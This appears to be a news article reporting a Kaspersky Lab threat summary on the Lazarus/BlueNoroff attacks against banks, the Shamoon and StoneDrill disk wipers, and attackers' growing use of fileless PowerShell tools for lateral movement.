A North Korea-linked hacking group responsible for multiple financial and destructive attacks is believed to be the most serious threat against banks, security firm Kaspersky Lab says.
The group, referred to as BlueNoroff or Lazarus, has been associated with numerous high profile attacks over the past several years, including the devastating attack against Sony Pictures in late 2014. Last year’s $81 million cyber heist from Bangladesh’s account at the New York Federal Reserve Bank has been attributed to this group as well.
The actor is also believed to have orchestrated an attack aimed at banks in Poland earlier this year, where the website of the Polish Financial Supervision Authority (knf.gov.pl) was hijacked and abused to deliver malware. The hackers inserted Russian words as decoy in the malware used in this attack, security researchers discovered.
Active since 2009 or earlier, Lazarus is believed to have been conducting a large campaign aimed at financial institutions worldwide. The operation is ongoing, with the most recent malware samples found in March. Kaspersky Lab says that currently the group “is probably the most serious threat against banks.”
BlueNoroff/Lazarus is, however, only one of the more than 100 threat actors and sophisticated malicious operations that Kaspersky Labs is monitoring at the moment. The attacks target commercial and government organizations in over 80 countries and show an evolution of these actors, with both Advanced Persistent Threat (APT) actors and financially motivated cybercriminals using the same tactics, techniques, and procedures (TTPs).
Other APT groups that were active during the first quarter of the year were Shamoon and StoneDrill, two separate actors that have aligned interests and which might be working together. Aimed at Saudi targets, the two malware families pack disk-wiping capabilities, which makes them extremely destructive.
According to Kaspersky, StoneDrill appears to have been around since 2014, with old samples attributed to the NewsBeef (Charming Kitten) group. The samples share the same credentials (username and password) for command and control (C&C) communications, and the security researchers suggest that StoneDrill might be a more recent version of NewsBeef artifacts.
Recently, StoneDrill was also used in attacks against targets in the energy industry in Europe, which suggests that the actor is expanding its reach outside of the Middle East, the security researchers suggest.
Another piece of malware related to the Shamoon attacks is Ismdoor, a backdoor used in Saudi Arabia to target the oil and energy industry. The attackers were also found to have used mainly Powershell-based tools for lateral movement, and to have adopted the trend of using fileless generic malware for nefarious operations.
The use of generic tools in attacks has been generally associated mainly with “not-so-big actors or cybercriminals,” who wouldn’t create their own set of malicious programs. Some of the available frameworks that offer many options, especially for lateral movement, include Nishang, Empire, Powercat, and Meterpreter, all of which are based on Powershell and allow the use of fileless backdoors.
“We have seen such techniques being widely adopted in the last few months. We find examples in the lateral movement tools used in Shamoon attacks, in attacks against Eastern European banks, and used by different APT actors such as CloudComputating, Lungen or HiddenGecko, as well as in the evolution of old backdoors like Hikit, which evolved to new fileless versions,” Kaspersky Lab explains.